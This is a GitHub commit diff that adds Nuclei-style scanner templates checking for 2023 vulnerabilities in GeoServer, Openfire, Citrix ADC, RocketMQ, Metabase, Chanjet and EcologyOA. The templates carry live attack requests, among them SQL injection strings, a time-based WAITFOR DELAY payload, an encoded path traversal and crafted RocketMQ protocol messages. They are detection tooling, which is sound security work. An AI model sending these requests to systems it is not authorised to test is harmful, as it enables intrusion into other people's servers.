-
Notifications
You must be signed in to change notification settings - Fork 3
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
0 parents
commit ca8609e
Showing
18 changed files
with
528 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,65 @@ | ||
| id: CVE-2023-25157 | ||
|
|
||
| info: | ||
| name: GeoServer OGC Filter - SQL Injection | ||
| author: ritikchaddha,DhiyaneshDK,iamnoooob,rootxharsh | ||
| severity: critical | ||
| description: | | ||
| GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse. | ||
| reference: | ||
| - https://twitter.com/parzel2/status/1665726454489915395 | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2023-25157 | ||
| - https://github.com/win3zz/CVE-2023-25157 | ||
| - https://github.com/geoserver/geoserver/security/advisories/GHSA-7g5f-wrx8-5ccf | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
| cvss-score: 9.8 | ||
| cve-id: CVE-2023-25157 | ||
| cwe-id: CWE-89 | ||
| cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* | ||
| metadata: | ||
| verified: "true" | ||
| shodan-query: title:"geoserver" | ||
| tags: cve,cve2023,geoserver,ogc,sqli,intrusive | ||
|
|
||
| http: | ||
| - raw: | ||
| - | | ||
| GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| - | | ||
| GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&maxFeatures=50&outputFormat=csv HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| - | | ||
| GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER=strStartswith({{column}},%27%27%27%27)=true HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| stop-at-first-match: true | ||
| iterate-all: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body_3 | ||
| words: | ||
| - "SQL SELECT" | ||
|
|
||
| - type: word | ||
| part: header_3 | ||
| words: | ||
| - text/xml | ||
|
|
||
| extractors: | ||
| - type: regex | ||
| part: body_1 | ||
| group: 1 | ||
| name: name | ||
| regex: | ||
| - '<FeatureType><Name>(.*?)<\/Name><Title>' | ||
| internal: true | ||
|
|
||
| - type: regex | ||
| part: body_2 | ||
| group: 1 | ||
| name: column | ||
| regex: | ||
| - 'FID,([aA-zZ_]+),' | ||
| internal: true |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,43 @@ | ||
| id: CVE-2023-32315 | ||
|
|
||
| info: | ||
| name: Administration Console Authentication Bypass in Openfire Console | ||
| author: vsh00t | ||
| severity: high | ||
| description: | | ||
| Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0. | ||
| remediation: | | ||
| The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0). Users are advised to upgrade. If an Openfire upgrade isn’t available for a specific release, or isn’t quickly actionable, users may see the linked github advisory (GHSA-gw42-f939-fhvm) for mitigation advice. | ||
| reference: | ||
| - https://github.com/advisories/GHSA-gw42-f939-fhvm | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2023-32315 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L | ||
| cvss-score: 8.6 | ||
| cve-id: CVE-2023-32315 | ||
| cwe-id: CWE-22 | ||
| metadata: | ||
| max-request: 1 | ||
| verified: true | ||
| shodan-query: title:"openfire" | ||
| tags: cve,cve2023,auth-bypass,openfire,console | ||
|
|
||
| http: | ||
| - raw: | ||
| - |+ | ||
| GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Origin: {{BaseURL}} | ||
| unsafe: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - 'class="head-num"' | ||
| condition: and | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,26 @@ | ||
| id: CVE-2023-3519 | ||
|
|
||
| info: | ||
| name: Citrix ADC/Gateway - SAML Assertion RCE | ||
| author: unknown | ||
| severity: critical | ||
| description: | | ||
| Citrix ADC/Gateway saml assertion RCE. | ||
| reference: | ||
| - https://blog.assetnote.io/2023/07/21/citrix-CVE-2023-3519-analysis/ | ||
| tags: citrix-adc,citrix-gateway | ||
|
|
||
| http: | ||
| - raw: | ||
| - | | ||
| POST /saml/login HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Content-Length: 3150 | ||
| Content-Type: application/x-www-form-urlencoded | ||
| SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCB4bWxuczpzYW1scD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOnByb3RvY29sIiB4bWxuczpzYW1sPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXNzZXJ0aW9uIiBJRD0icGZ4NDFkOGVmMjItZTYxMi04YzUwLTk5NjAtMWIxNmYxNTc0MWIzIiBWZXJzaW9uPSIyLjAiIFByb3ZpZGVyTmFtZT0iU1AgdGVzdCIgRGVzdGluYXRpb249Imh0dHA6Ly9pZHAuZXhhbXBsZS5jb20vU1NPU2VydmljZS5waHAiIFByb3RvY29sQmluZGluZz0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmJpbmRpbmdzOkhUVFAtUE9TVCIgQXNzZXJ0aW9uQ29uc3VtZXJTZXJ2aWNlVVJMPSJodHRwOi8vc3AuZXhhbXBsZS5jb20vZGVtbzEvaW5kZXgucGhwP2FjcyI+CiAgPHNhbWw6SXNzdWVyPkE8L3NhbWw6SXNzdWVyPgogIDxkczpTaWduYXR1cmUgeG1sbnM6ZHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiPgogICAgPGRzOlNpZ25lZEluZm8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpTaWduYXR1cmVNZXRob2QgQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjcnNhLXNoYTEiLz4KICAgICAgPGRzOlJlZmVyZW5jZSBVUkk9IiNwZng0MWQ4ZWYyMi1lNjEyLThjNTAtOTk2MC0xYjE2ZjE1NzQxYjMiPgogICAgICAgIDxkczpUcmFuc2Zvcm1zPgogICAgICAgICAgPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNlbnZlbG9wZWQtc2lnbmF0dXJlIi8+CiAgICAgICAgICA8ZHM6VHJhbnNmb3JtIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgICAgPC9kczpUcmFuc2Zvcm1zPgogICAgICAgIDxkczpEaWdlc3RWYWx1ZT5BPC9kczpEaWdlc3RWYWx1ZT4KICAgICAgPC9kczpSZWZlcmVuY2U+CiAgICA8L2RzOlNpZ25lZEluZm8+CiAgICA8ZHM6U2lnbmF0dXJlVmFsdWU+QTwvZHM6U2lnbmF0dXJlVmFsdWU+CiAgPC9kczpTaWduYXR1cmU+CiAgPHNhbWxwOk5hbWVJRFBvbGljeSBGb3JtYXQ9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjEuMTpuYW1laWQtZm9ybWF0OmVtYWlsQWRkcmVzcyIgQWxsb3dDcmVhdGU9InRydWUiLz4KICA8c2FtbHA6UmVxdWVzdGVkQXV0aG5Db250ZXh0IENvbXBhcmlzb249ImV4YWN0Ij4KICAgIDxzYW1sOkF1dGhuQ29udGV4dENsYXNzUmVmPnVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphYzpjbGFzc2VzOlBhc3N3b3JkUHJvdGVjdGVkVHJhbnNwb3J0PC9zYW1sOkF1dGhuQ29udGV4dENsYXNzUmVmPgogIDwvc2FtbHA6UmVxdWVzdGVkQXV0aG5Db250ZXh0Pgo8L3NhbWxwOkF1dGhuUmVxdWVzdD4= | ||
| matchers: | ||
| - type: word | ||
| words: | ||
| - 'SAML Assertion verification failed; Please contact your administrator' | ||
| part: body |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,19 @@ | ||
| id: CVE-2023-37582 | ||
|
|
||
| info: | ||
| name: RocketMQ Broker - Remote Code Execution | ||
| author: unknown | ||
| severity: critical | ||
| description: For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. | ||
| reference: https://github.com/Le1a/CVE-2023-33246 | ||
|
|
||
| tcp: | ||
| - inputs: | ||
| - data: "{{hex_decode('000000d0000000b27B22636F6465223A3331382C226578744669656C6473223A7B224163636573734B6579223A22726F636B65746D7132222C225369676E6174757265223A2263474A6A713146424D2B3455426C52734E444E746B3055396E44303D227D2C22666C6167223A302C226C616E6775616765223A224A415641222C226F7061717565223A302C2273657269616C697A655479706543757272656E74525043223A224A534F4E222C2276657273696F6E223A3433357D746869735F69735F6B65793D746869735F69735F76616C75650a')}}" | ||
| host: | ||
| - "{{Hostname}}" | ||
| matchers: | ||
| - type: regex | ||
| regex: | ||
| #"434" "V5_1_0" | ||
| - '"version":(0|[1-9]d{0,2}|4[0-2]d|43[0-4])' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,39 @@ | ||
| id: CVE-2023-38646 | ||
|
|
||
| info: | ||
| name: Metabase - Unauthorized RCE | ||
| author: unknown | ||
| severity: critical | ||
| description: | | ||
| Metabase has unauthorized access to execute arbitrary commands. | ||
| reference: | ||
| - https://mp.weixin.qq.com/s/ATFwFl-D8k9QfQfzKjZFDg | ||
| tags: metabase,cve,cve2023 | ||
|
|
||
| http: | ||
| - raw: | ||
| - | | ||
| GET /api/session/properties HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| - | | ||
| POST /api/setup/validate HTTP/2 | ||
| Host: {{Hostname}} | ||
| Content-Type: application/json | ||
| Content-Length: 244 | ||
| {"token":"{{token}}","details":{"is_on_demand":false,"is_full_sync":false,"is_sample":false,"cache_ttl":null,"refingerprint":true,"auto_run_queries":true,"schedules":{},"details":{},"name":"test","engine":"mysql"}}} | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body_2 | ||
| words: | ||
| - "we couldn't connect to the database" | ||
|
|
||
| extractors: | ||
| - type: regex | ||
| part: body_1 | ||
| group: 1 | ||
| name: token | ||
| regex: | ||
| - '"setup-token":"(.*?)"' | ||
| internal: true |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,21 @@ | ||
| id: chanjetcrm-sqli | ||
|
|
||
| info: | ||
| name: Chanjetcrm - SQL Injection | ||
| author: unknown | ||
| severity: critical | ||
| description: | | ||
| There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou. | ||
| reference: | ||
| - https://stack.chaitin.com/techblog/detail?id=10 | ||
| tags: chanjetcrm,sqli | ||
|
|
||
| http: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/WebSer~1/create_site.php?site_id=1" | ||
| matchers: | ||
| - type: word | ||
| words: | ||
| - "register fail,please again" | ||
| part: body |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,26 @@ | ||
| id: chanjettplus-sqli | ||
|
|
||
| info: | ||
| name: chanjettplus - SQL Injection | ||
| author: unknown | ||
| severity: critical | ||
| description: | | ||
| There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou. | ||
| reference: | ||
| - https://stack.chaitin.com/vuldb/detail?id=f4ae9a80-58c7-4a5c-a463-ae4e40605880 | ||
| tags: chanjettplus,sqli | ||
|
|
||
| http: | ||
| - raw: | ||
| - | | ||
| POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Content-Type: text/plain | ||
| Cookie: ASP.NET_SessionId=; sid=admin | ||
| {"accNum": "6'", "functionTag": "SYS0104", "url": ""} | ||
| matchers: | ||
| - type: word | ||
| words: | ||
| - "附近有语法错误" | ||
| part: body |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,23 @@ | ||
| id: CVE-2023-33246 | ||
|
|
||
| info: | ||
| name: RocketMQ Broker - Remote Code Execution | ||
| author: unknown | ||
| severity: critical | ||
| description: For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. | ||
| reference: https://github.com/Le1a/CVE-2023-33246 | ||
|
|
||
| tcp: | ||
| - inputs: | ||
| - data: "{{hex_decode('000000c7000000c37b22636f6465223a3130352c226578744669656c6473223a7b225369676e6174757265223a222f7535502f775a5562686a616e75344c4d2f557a45646f327532493d222c22746f706963223a22544257313032222c224163636573734b6579223a22726f636b65746d7132227d2c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a312c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3433337d')}}" | ||
| host: | ||
| - "{{Hostname}}" | ||
| matchers: | ||
| - type: regex | ||
| regex: | ||
| #"434" "V5_1_0" | ||
| - '"version":(0|[1-9]d{0,2}|4[0-2]d|43[0-4])' | ||
| extractors: | ||
| - type: regex | ||
| regex: | ||
| - '"brokerAddrs":.*?\}' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,25 @@ | ||
| id: ecology-oa-byxml-xxe | ||
|
|
||
| info: | ||
| name: EcologyOA deleteUserRequestInfoByXml - XXE | ||
| author: unknown | ||
| severity: high | ||
| description: EcologyOA deleteUserRequestInfoByXml interface has XXE | ||
| tags: ecology-oa,xxe | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| GET /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Content-Length: 35 | ||
| Content-Type: application/xml | ||
| Accept-Encoding: gzip | ||
| <?xml version="1.0"?> | ||
| <!DOCTYPE> | ||
| matchers: | ||
| - type: word | ||
| words: | ||
| - 'WfData' | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,20 @@ | ||
| id: ecology-oa-clusterupgrade-upload | ||
|
|
||
| info: | ||
| name: EcologyOA clusterupgrade - upload | ||
| author: unknown | ||
| severity: high | ||
| description: EcologyOA clusterupgrade interface has file upload vulnerability | ||
| tags: ecology-oa,upload | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| GET /clusterupgrade/uploadFileClient.jsp HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| matchers: | ||
| - type: word | ||
| words: | ||
| - 'error,安全校验失败' | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,25 @@ | ||
| id: ecology-oa-filedownloadforoutdoc-sqli | ||
|
|
||
| info: | ||
| name: EcologyOA filedownloadforoutdoc - SQL injection | ||
| author: unknown | ||
| severity: critical | ||
| description: EcologyOA filedownloadforoutdoc interface has SQL injection | ||
| tags: ecology-oa,sqli | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Accept: */* | ||
| Accept-Encoding: gzip, deflate | ||
| Accept-Language: zh-CN,zh;q=0.9 | ||
| Connection: close | ||
| fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1 | ||
| matchers: | ||
| - type: dsl | ||
| dsl: | ||
| - 'duration>=5' | ||
|
|
Oops, something went wrong.